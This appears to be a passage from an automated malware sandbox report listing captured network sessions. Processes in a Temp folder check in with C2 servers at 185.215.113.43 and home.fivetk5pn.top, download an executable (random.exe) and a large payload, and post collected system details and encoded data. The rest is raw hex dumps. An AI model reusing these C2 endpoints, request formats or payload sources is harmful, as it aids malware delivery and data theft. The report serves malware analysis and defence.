Dec 17, 2024 06:03:38.648376942 CET	1236	IN	Data Raw: 19 dc 60 77 24 32 db bc f6 ae b9 05 48 96 0f 6b d1 fe 36 e9 1b 0f 2f bd 14 40 ca e7 d1 cb 45 5c 05 73 cb 85 79 d6 c0 84 84 b4 f9 8b 61 10 00 e8 86 ab 19 c8 80 e8 65 e3 b4 f3 7e 20 78 05 c7 85 b7 64 1d df 85 35 ec 8f 15 44 f9 ca d4 c8 49 2f 78 8e Data Ascii: `w$2Hk6/@E\syae~ xd5DI/xFKA4wRH1FVwDe!=qR{69Ff1]sl rd3c96Oe;o&~d+:tf@nE3HnSnERbL9WSr%6U
Dec 17, 2024 06:03:38.648412943 CET	1236	IN	Data Raw: 31 5f 80 a3 a6 f3 7e 21 2c 7b e2 e6 29 8a eb 30 cd 89 39 44 41 2d a1 1f 61 f2 28 76 2c 93 41 1b ab 85 ab 6e 34 3e 1f 28 76 92 91 2f 23 cd 90 58 54 ce 15 20 bf 20 ce e4 28 03 ba 46 48 df 77 27 ee f7 f4 e3 01 6f 19 db f9 0d 15 7a 58 5b 7e 78 f0 95 Data Ascii: 1_~!,{)09DA-a(v,An4>(v/#XT (FHw'ozX[~x1e9\|`^y%^0`?{kVe+5P?<,qq%QoptH;qy{B%lm@)\|BL/
Dec 17, 2024 06:03:38.768524885 CET	1236	IN	Data Raw: 1d d6 30 ed fb 8b 94 6d 63 3b 65 43 b6 6c 28 fa 7a 17 f8 3b 08 aa c6 ed f3 66 4b d9 3d ee 43 67 38 9e 13 6c 58 e2 b2 9f 6c 72 0a a0 45 60 e0 71 3e 7a f4 6d 0d 47 03 1e 83 a5 1b 9e c5 96 02 de 04 f2 cd c1 e8 d5 50 58 66 20 89 b4 6d e3 87 25 2b a4 Data Ascii: 0mc;eCl(z;fK=Cg8lXlrE`q>zmGPXf m%+%jA:lo?&i}Lap 3,=}+isHu\jLLAb}'foDF'rUE5P0lG?S]*dUHgX>{4&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49928	185.215.113.43	80	2704	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 06:03:48.151068926 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 36 34 39 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016492001&unit=246122658369
Dec 17, 2024 06:03:49.502156019 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 17 Dec 2024 05:03:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49933	185.215.113.16	80	2704	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 06:03:49.630036116 CET	55	OUT	GET /luma/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 17, 2024 06:03:50.974004030 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 17 Dec 2024 05:03:50 GMT Content-Type: application/octet-stream Content-Length: 1892864 Last-Modified: Tue, 17 Dec 2024 04:40:57 GMT Connection: keep-alive ETag: "676100d9-1ce200" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 b0 00 00 00 00 00 00 00 60 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 4a 00 00 04 00 00 cc 83 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL<_g`J@J@T0h 1 H@.rsrc X@.idata 0\@ *@^@sqzmxkkd`/\`@vbjjmcvuPJ@.taggant0`J"@
Dec 17, 2024 06:03:50.974072933 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:03:50.974126101 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:03:50.974179029 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:03:50.974212885 CET	496	IN	Data Raw: 11 0a 50 e6 66 69 cd b5 40 a3 ab d5 60 43 7d c2 8b 13 f4 d9 ee 8a d2 46 ae d6 27 36 ce 14 e7 7c 1a 7a 76 4d 64 be cf 94 de ea e7 de 56 02 b1 47 68 93 ce 14 f6 61 e7 7a 97 e3 ad 91 af 5b b1 62 55 b8 00 64 db 2c 1a 84 9b 3d 6f 99 d3 75 19 59 a1 0e Data Ascii: Pfi@`C}F'6\|zvMdVGhaz[bUd,=ouY-Y\]mM*y6L'Z^tD~O\oWp5V\|Nc{$IjuT4garWVZUmwRVmWS ov0yTx~(5E8"Trw\|f
Dec 17, 2024 06:03:50.974247932 CET	1236	IN	Data Raw: bd b5 f8 79 60 16 6d 29 92 f9 ee 87 a3 4e be 94 12 e6 ed 21 74 e2 42 a5 87 aa b4 d8 1c 90 94 be 92 95 ef 3f c6 6e 36 e2 4a a7 e4 14 b7 70 43 8c 82 d5 f7 87 f6 20 2d 7a 93 c1 da ab ae 81 98 bc d5 b3 f9 b6 40 0d b1 57 26 39 40 dc cb 79 fe c3 d1 a0 Data Ascii: y`m)N!tB?n6JpC -z@W&9@y5'<7L"wGZl{s~}qM?{E%xFXuu\N.tZl@f&HAY<m8VX_8sTSD`Xft'TG^kYE(GY
Dec 17, 2024 06:03:50.974298954 CET	1236	IN	Data Raw: c0 ca 68 29 ed 4a 2d 62 56 3a 02 bd 55 5b 10 44 5e 07 bc 4c 6b 9c a5 d6 8a 8a 12 6d 80 dc f7 b7 c9 39 56 aa 1f fa 3b 89 8a a6 b1 94 ac 45 f4 00 fb d4 d0 dc bc ec 19 42 71 78 d5 42 3f fc 55 c1 b1 d7 08 bd c2 00 0f a6 ce b0 ac 8d 4f be 05 08 a3 94 Data Ascii: h)J-bV:U[D^Lkm9V;EBqxB?UOeDM8Yzl?7;{rAEj+BQ*p1]shdZ9JoqFNJ`JqUyQwTCn?W:VES^HyKDYy+\|
Dec 17, 2024 06:03:50.974333048 CET	1236	IN	Data Raw: 5d 5c 35 98 f4 ba 4f 5b 65 ae d0 21 0a b9 c4 f5 ee 72 0c 4b b2 4a 62 97 3c 93 b5 9b cd 4e aa 0a 1f 6e dd a5 b7 a2 b1 86 d2 dd 0a 19 89 e2 f5 74 bf e9 c0 9b 67 6b ea ee 30 cb 53 b3 4d 48 db 37 32 93 ef b9 1d c2 fa 80 08 85 0e 14 c8 8d 2c c1 4d b2 Data Ascii: ]\5O[e!rKJb<Nntgk0SMH72,MC.32n[dXvnDIMt]\|;N@hVl)PMVv&~WCdlsTU^}6ZXu)XJ/&Y]n'=K@]~AM
Dec 17, 2024 06:03:50.974365950 CET	372	IN	Data Raw: 84 84 fd 6e c8 6a ea 18 f2 c5 0a 59 be a6 97 d1 33 ae fe 50 55 57 00 56 02 2f 20 5b 34 f3 f9 d8 53 5f 9f 30 be 3c eb 73 ce dd ae 1e cf b2 33 98 b1 2b 61 04 90 1a f8 d7 e0 bb e7 a6 39 1c dd f0 2e b2 80 0e 3b 21 c4 c2 b3 42 31 c4 d9 b4 b6 3a 55 50 Data Ascii: njY3PUWV/ [4S_0<s3+a9.;!B1:UP:^nn_3.~!CbmEQM2MtFK8<ap)43AkfU5ZF]UUkJ_gYbL
Dec 17, 2024 06:03:50.974399090 CET	1236	IN	Data Raw: dd cd 6d 35 b8 eb 0d 20 8f eb ed eb ea 25 f8 d8 f7 4b 45 26 76 4e cf 4c 8a 02 6f 2b 9e 32 f4 d7 e6 1e e5 09 9a d0 4f 7f ac 65 64 51 29 3e 3d c6 f7 4e e8 95 89 b2 f8 48 b7 fb a7 7d e7 5b e1 96 7b 5d 6d 74 5f f5 7e 9b d3 44 8f 9e b1 6d e9 91 a7 26 Data Ascii: m5 %KE&vNLo+2OedQ)>=NH}[{]mt_~Dm&p1jbBTJ`olkd26I}1AK..!j62/"OUinY\e@Fl^!%[&k(ZW[(+8&_vT&yjw
Dec 17, 2024 06:03:51.094675064 CET	1236	IN	Data Raw: a3 34 f6 59 10 49 3a 0b cf c3 0e 3c c4 02 48 39 d7 68 5d 49 bc 6b 1f 38 9d 02 2e 4e de aa 2a de 25 5c 29 f8 ac 78 aa 1c d9 d4 87 07 0c f4 a4 81 1e 13 5a 6d 9f 64 58 b8 ae e5 13 c0 8d 42 26 8f a3 05 37 5a 55 10 24 56 09 35 76 8f d7 19 22 98 0c f4 Data Ascii: 4YI:<H9h]Ik8.N%\)xZmdXB&7ZU$V5v"(;\|"[13vB{R84>q2 N,/eux\VfR2AT$2yTTVU`XQi\,`b)%/=Qnnw\|rh^=1q:J+Adx

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49940	104.154.220.71	80	7092	C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 06:03:52.287230968 CET	12360	OUT	POST /vJNDHPUXPCEIZZjTPbLp1734325090 HTTP/1.1 Host: home.fivetk5pn.top Accept: / Content-Type: application/json Content-Length: 500181 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 34 31 31 38 33 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "1734411830", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name": "svchost.exe", "pid": 280 }, { "name": "svchost.exe", "pid": [TRUNCATED]
Dec 17, 2024 06:03:52.407165051 CET	2472	OUT	Data Raw: 70 56 73 4c 6a 63 50 57 77 75 4a 70 4e 71 36 56 53 68 58 68 54 71 77 62 54 75 6c 4b 4b 64 74 52 72 5c 2f 41 48 54 2b 48 38 78 55 4e 57 74 72 4d 4d 38 5c 2f 55 5c 2f 38 41 31 7a 55 62 5c 2f 64 50 34 66 7a 46 64 42 79 6b 4e 46 53 37 54 5c 2f 65 50 Data Ascii: pVsLjcPWwuJpNq6VShXhTqwbTulKKdtRr\/AHT+H8xUNWtrMM8\/U\/8A1zUb\/dP4fzFdBykNFS7T\/eP+fxp9AEWw+3+fwo2H2\/z+FfsF4k\/4JO6r4YvBBffGnzLOZytnqUPw1LWtyOSEbPj79xdBQTJayMXXazRtNDsmela\/8EslucZ+O\/lk9v8AhWG7\/wB6Guece9fwfiP2mf0IsJXqYbE+NU6Fem7Tp1PDPxfjJdU
Dec 17, 2024 06:03:52.407243967 CET	4944	OUT	Data Raw: 71 76 56 69 6f 32 58 75 50 78 5c 2f 78 6f 4e 43 4f 71 39 54 66 78 5c 2f 77 44 41 66 36 30 6a 39 50 78 5c 2f 6f 61 44 53 6e 31 2b 58 36 6b 56 46 46 52 79 64 76 78 5c 2f 70 51 61 45 64 46 46 46 42 30 45 63 6e 62 38 66 36 56 48 55 6b 6e 62 38 66 36 Data Ascii: qvVio2XuPx\/xoNCOq9Tfx\/wDAf60j9Px\/oaDSn1+X6kVFFRydvx\/pQaEdFFFB0Ecnb8f6VHUknb8f6VHQBHJ2\/Go6lfp+P+NRUHQRydvx\/pUMvf8A3v8AGrVQt0+\/n\/P4j86DSn1+X6lWirFV60p9fl+p0U+vy\/Uhf7x\/D+QptWKrtvJ4T8uB+VV7\/wDd\/E0In6\/h\/U0yrFV6xOgr01\/un8P5ippO34\/0qO
Dec 17, 2024 06:03:52.407295942 CET	2472	OUT	Data Raw: 2f 59 70 54 63 76 45 7a 78 71 58 62 67 50 68 39 5c 2f 77 44 6d 77 54 5c 2f 34 4a 5c 2f 6b 35 2b 31 37 6a 79 2b 48 6e 68 44 32 5c 2f 31 31 7a 78 66 2b 59 4b 44 36 36 5c 2f 38 4d 65 4d 31 48 4a 32 5c 2f 47 70 4b 52 67 57 5c 2f 50 4e 66 39 45 35 5c Data Ascii: /YpTcvEzxqXbgPh9\/wDmwT\/4J\/k5+17jy+HnhD2\/11zxf+YKD66\/8MeM1HJ2\/GpKRgW\/PNf9E5\/gwQUVLsHv\/n8KNg9\/8\/hQBxPjjxcvgzSIdUawbUTPfw2CW4uRaANLBc3BkaYwXOFVLVhtETFmZRlRkj7x\/Yk\/4LSf8McfCnxB8Mf+GbP+Fjf278QtV8d\/23\/wuL\/hEPsv9p+HPCfh\/wDsr+zf+FV+KP
Dec 17, 2024 06:03:52.407393932 CET	2472	OUT	Data Raw: 38 4f 50 68 39 38 4d 66 2b 45 39 2b 48 56 68 6f 50 77 38 38 4b 65 48 5c 2f 41 41 66 6f 73 75 74 2b 48 5c 2f 32 57 76 69 4a 4a 34 77 76 62 72 53 76 44 6d 6e 36 66 5a 53 36 73 76 69 2b 2b 31 7a 54 4c 72 55 4c 68 4c 69 5c 2f 75 34 4e 4d 74 54 63 33 Data Ascii: 8OPh98Mf+E9+HVhoPw88KeH\/AAfosut+H\/2WviJJ4wvbrSvDmn6fZS6svi++1zTLrULhLi\/u4NMtTc3H7uO3t\/3Q\/tr9ob\/oUf29\/wDwJ\/4Jef8AzT1\/J3i5wBwth884XqcIYbKuBcrzzw94b4qqZRxFxBjZ11is8x+eq0MRmFbMK06tHCYLCQxdGnVjSoVOXlhzVJt\/0PwRxjnqyzOIZ9HNeLsbl3FmdZHHMMiyf
Dec 17, 2024 06:03:52.407403946 CET	2472	OUT	Data Raw: 52 5c 2f 6b 6a 5c 2f 36 5a 66 76 66 30 5c 2f 77 41 39 4b 68 66 5a 74 2b 65 54 4c 78 5c 2f 76 59 76 38 41 6c 76 38 41 55 57 6e 4e 58 4e 76 6d 66 4f 68 32 45 5c 2f 38 41 54 4c 38 5c 2f 70 55 50 6c 5c 2f 4e 5c 2f 79 7a 54 7a 50 54 4a 39 50 38 5c 2f Data Ascii: R\/kj\/6Zfvf0\/wA9KhfZt+eTLx\/vYv8Alv8AUWnNXNvmfOh2E\/8ATL8\/pUPl\/N\/yzTzPTJ9P8\/8A1q0p9fl+p1U6nyt+H\/A36akLN5kj702W0n\/PT\/X49un+fpmoVk8ve+z5PN83H5fn3zzRKrr87pHD5n\/PT9+f8\/596fueKPf52zy5fK7+fN2rQ2Ief3KRpI+\/14\/T\/wCvVbd5Z\/57eXz\/ANMO\/wCf
Dec 17, 2024 06:03:52.407428026 CET	2472	OUT	Data Raw: 65 6f 53 73 69 78 32 30 4e 37 70 46 37 48 62 75 35 6b 6d 67 6a 32 5c 2f 32 67 74 6b 47 45 6b 68 79 4d 68 46 4d 76 6c 34 5c 2f 62 6e 51 6f 66 68 31 34 71 73 6e 69 74 4e 52 30 76 78 52 62 58 39 72 4a 48 50 59 33 4d 73 4d 30 56 31 5a 33 4d 54 52 7a Data Ascii: eoSsix20N7pF7Hbu5kmgj2\/2gtkGEkhyMhFMvl4\/bnQofh14qsnitNR0vxRbX9rJHPY3MsM0V1Z3MTRzRz6VMFae0uIWeOWO4hmgljLq25civ4M+kjx3S8PeNKuBzTKo51w\/xdl3DGc4zAVKGMh7TE5FmWJoVI4LMKOIw1HC4uvhcDTwuK55V5fVKtKUqGlGR\/p79D\/gGv4n+G7x2UZrHI+KODM24uyDA5rCvgqlTC4PiH
Dec 17, 2024 06:03:52.407572031 CET	4944	OUT	Data Raw: 47 5c 2f 38 41 74 6a 77 72 62 5c 2f 41 33 34 59 57 56 39 34 4e 5c 2f 34 52 54 78 33 66 61 66 70 47 6e 5c 2f 41 4e 6f 61 76 71 47 68 36 33 5c 2f 77 6b 4e 74 4d 32 70 57 6e 5c 2f 43 50 66 32 62 44 45 31 74 71 31 34 36 66 70 64 5c 2f 77 35 59 5c 2f Data Ascii: G\/8Atjwrb\/A34YWV94N\/4RTx3fafpGn\/ANoavqGh63\/wkNtM2pWn\/CPf2bDE1tq146fpd\/w5Y\/4Jnf8ARtX\/AJmP4\/f\/AD1K+1v2e\/2afgj+yr4Fuvhr8A\/Atv8AD\/wXe+ItQ8WXukQ634l8QyXniLVLPTNOvtVu9W8W61r2tXNxLYaNpVkqzai8MFrYW0FvFFHGFr+EsFlWMpYz61iqlCV6LpydCdWNST5Yx
Dec 17, 2024 06:03:52.407619953 CET	2472	OUT	Data Raw: 7a 4f 5c 2f 5a 48 78 5c 2f 77 42 4e 36 5a 39 37 2b 50 59 5c 2f 6d 6d 4c 5c 2f 41 46 58 2b 75 5c 2f 7a 2b 75 66 66 6b 4f 67 5a 4a 76 2b 54 59 38 62 5c 2f 76 66 2b 65 76 35 66 68 30 36 55 7a 37 72 4a 5c 2f 48 5c 2f 73 53 66 6c 32 70 37 62 48 6a 6d Data Ascii: zO\/ZHx\/wBN6Z97+PY\/mmL\/AFX+u\/z+uffkOgZJv+TY8b\/vf+ev5fh06Uz7rJ\/H\/sSfl2p7bHjm3+Ynmf8AbDH+f\/r5FPj\/AHnqj\/8ALKOSLH+fx96AKcn95Pr5X5nH8un5d6k8xBJ\/qfJmn\/e5\/wBdx1\/0TGf88elO3bZE2TRun5\/45\/pioVkMfnM6SfvP+ff\/AJ9x3\/8A1dq09p5fj\/wAGyY8vfvkd
Dec 17, 2024 06:03:52.527800083 CET	7416	OUT	Data Raw: 2b 48 2b 76 2b 4e 6d 58 54 72 72 51 64 4c 76 4e 4f 38 54 65 45 37 33 58 76 4c 66 45 47 74 32 66 68 33 39 6e 7a 34 55 5c 2f 74 4d 33 74 5c 2f 34 63 75 5c 2f 68 62 38 58 5a 5c 2f 45 31 6c 6f 6b 2b 6d 36 7a 50 63 61 5c 2f 34 61 31 4c 77 35 34 74 38 Data Ascii: +H+v+NmXTrrQdLvNO8TeE73XvLfEGt2fh39nz4U\/tM3t\/4cu\/hb8XZ\/E1lok+m6zPca\/4a1Lw54t8Y+C7ax8daPc6VZf2C\/ivWPh749PhC4tLvWLTVbfwd4iSeex1DTJ7Afna8WPDX688ufGWTRxizVZIqdSrUpwnmsqmOw6wdKvUpxw9ao8XluOwPNSqzp\/2jhqmXc\/15LDv9Zh4G+LtTLIZxS8P+Iq2XTyujnPt6O
Dec 17, 2024 06:03:52.528059959 CET	7416	OUT	Data Raw: 7a 6f 4f 67 70 68 48 34 2b 66 37 4d 6e 2b 66 39 4b 2b 76 30 78 55 30 71 76 4a 49 2b 78 4d 76 48 4c 35 58 6d 66 38 41 50 61 33 5c 2f 41 4d 39 65 6e 38 36 50 6e 45 61 62 4e 6e 2b 71 38 33 5c 2f 70 76 44 2b 6e 58 6d 6d 53 66 33 35 45 6a 52 4d 5c 2f Data Ascii: zoOgphH4+f7Mn+f9K+v0xU0qvJI+xMvHL5Xmf8APa3\/AM9en86PnEabNn+q83\/pvD+nXmmSf35EjRM\/8tPyPt9M\/h7dBpT6\/L9Rj7PnQpvxL+6j\/wDSv\/Prx7VW+fP+x\/119+v+frjtVmTztvkzYT96D+7\/AHF9\/wBfXpj8Owpn94J7\/ZZP6Y\/z2oNCH7sifJs\/9qj\/AD\/k5pkkb7UV\/s\/18v8AX1\/Gny
Dec 17, 2024 06:03:54.875444889 CET	164	IN	HTTP/1.1 200 OK server: nginx/1.22.1 date: Tue, 17 Dec 2024 05:03:54 GMT content-type: text/html; charset=utf-8 content-length: 26 Data Raw: 45 45 4f 67 4d 45 6e 30 74 48 41 68 4f 6b 4d 75 31 37 33 34 34 31 31 38 33 34 Data Ascii: EEOgMEn0tHAhOkMu1734411834

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49949	104.154.220.71	80	7092	C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 06:03:55.194052935 CET	123	OUT	GET /vJNDHPUXPCEIZZjTPbLp1734325090?argument=EEOgMEn0tHAhOkMu1734411834 HTTP/1.1 Host: home.fivetk5pn.top Accept: /
Dec 17, 2024 06:03:56.632921934 CET	1236	IN	HTTP/1.1 200 OK server: nginx/1.22.1 date: Tue, 17 Dec 2024 05:03:56 GMT content-type: application/octet-stream content-length: 10816560 content-disposition: attachment; filename="5VzUKxynQgTDfd;" last-modified: Mon, 16 Dec 2024 04:58:11 GMT cache-control: no-cache etag: "1734325091.0903454-10816560-873928378" Data Raw: 27 2a ef 7e fc 03 e2 13 8b 2b 8e d2 9c 96 fe 99 bb 6f 9e be 0d 93 8e 51 95 f6 5c c1 cc e1 81 a1 65 a5 20 ad d3 7b 01 c7 7d 97 21 98 8f 30 3e 9e 70 41 a8 01 35 4b d6 ab 6f 38 64 ba 5e 6d 85 00 6c b8 83 f2 6a ac 1c 3e 11 b6 af 3f 8a f9 fa 79 7f f8 2b ff 29 43 cc 6d b2 2a fa d8 2f d6 71 ec b8 8c dd 71 7d d5 27 74 1a 35 af 3b e3 15 c5 5a ee fe 03 9b e9 ac 4e ff 2e 4f 60 ff ce ff 70 7a ce ae ce 62 c2 cb 94 54 11 91 02 c1 39 9a ca 02 83 5a 50 22 5d 7e f9 08 99 38 85 c6 94 99 05 2a 3b 94 f5 61 72 35 63 a6 95 f8 e2 0e a5 51 ab ad be 41 2b ca eb 69 aa e0 c0 f6 26 55 b4 4d 34 7d 53 a7 b7 97 3d 1a 33 fe ef fa b2 63 4f 4c c0 70 b7 85 eb fb aa 5b 13 22 bc e6 bb 51 7a 71 22 64 c3 1d d0 df 94 eb 5b 00 ac 34 15 43 13 91 1e 5a 6a ae 1e 38 b0 e4 10 8c 88 58 94 ba d8 d9 3f 4f 6c 08 09 06 a0 63 8c 24 11 3e a6 ab 09 e1 75 96 42 0f 2f 5a 6c f1 eb e0 6b 09 87 ea 71 67 83 ca 39 3b da 12 f6 50 71 64 94 51 5f bc c6 27 0f 36 2a 8f 4b 22 f5 1b 4d db 27 2f 96 08 c8 a3 a9 43 13 9d 11 65 da 84 cd a4 b2 ca fd 57 6d 77 d2 17 5a 76 [TRUNCATED] Data Ascii: '~+oQ\e {}!0>pA5Ko8d^mlj>?y+)Cm/qq}'t5;ZN.O`pzbT9ZP"]~8;ar5cQA+i&UM4}S=3cOLp["Qzq"d[4CZj8X?Olc$>uB/Zlkqg9;PqdQ_'6K"M'/CeWmwZvTQ'N"Zz_i,][kb,YYztW/h%A<3PpY}Ru(y=PO1v9Fv<TZoV~/'KSl@D jo,;n\m%SdhSLPG:<H+.@{gbkCn\|ibs1g~G"ohxJ6AeOK+<]n92{I=_8(Xu>gMnYt)E:_35K!\}Mwq$>73W[z5D~GTLAY2enxQK$~+lA_[4Rbs?^/78}0CfKNAcUQSZdNxZfM5LfiIyr,=mP8I6nb-\|>T0=)R3^x[N7R3_\|v`>=So>
Dec 17, 2024 06:03:56.632936954 CET	1236	IN	Data Raw: fd 69 ab 67 3d 2a 0a 0f 3f 89 f5 8f 63 09 c1 b4 b3 61 5a 0d 91 77 f3 58 2a f4 f4 86 bd 95 6a 7c b1 2e 35 03 ec 55 f9 d3 0c 6f a7 9a a0 cf 5b 1b 2c 97 95 97 77 57 19 11 6f d3 f3 7c 9f f9 25 45 de 37 c1 37 fe 78 2f ae a7 7c a7 50 a9 b7 60 04 bd ca Data Ascii: ig=?caZwXj\|.5Uo[,wWo\|%E77x/\|P`uDeY(^AgR!3XK#OXs^T;jG/\g)Vnc`f;B'Z4[cK3542XUfzq\|rtPgal>jR
Dec 17, 2024 06:03:56.632947922 CET	1236	IN	Data Raw: aa 0f 41 7f e0 ec ec a0 4f 20 62 e0 ba 7a c5 d4 b1 06 7a 2b 23 88 ae bb 97 17 70 71 54 96 4d b7 27 5d 48 5d c7 d7 b6 a2 f7 76 2e 43 aa a4 2f af c2 93 e3 1b 26 eb 2a 0a bd 96 5a 64 5b 21 1d c5 ef c9 dd af 8f 9b 8e 86 20 5c b4 c9 81 90 3e 4e 33 03 Data Ascii: AO bzz+#pqTM']H]v.C/&*Zd[! \>N3yn\|)GCnN\|UdHco-GASd-nBdM]NJz6<1+QtUq3}e{QSUK]<wW:pNmQH!y,c?J%Q\
Dec 17, 2024 06:03:56.633032084 CET	1236	IN	Data Raw: 84 4c 6b 00 d0 b3 30 a1 38 6a 30 17 80 9e 06 3d 87 87 71 30 31 b8 31 90 66 1f af a4 7d 67 1e 17 6c ae 75 d6 04 5d a3 5b 7f 79 88 5b ab f0 8a 06 4c fd b7 4b a0 7d d7 a7 c5 5c cc 72 75 c4 6b 77 d4 cf 53 bd bc 13 c9 67 ab 14 4d 14 20 37 02 00 f0 b5 Data Ascii: Lk08j0=q011f}glu][y[LK}\rukwSgM 7Z#&5{4a.->aCY5PiZT!bK+hZssbw7^2P"Ef!\tyjF+6q+n5RqbjKG&R;9,u
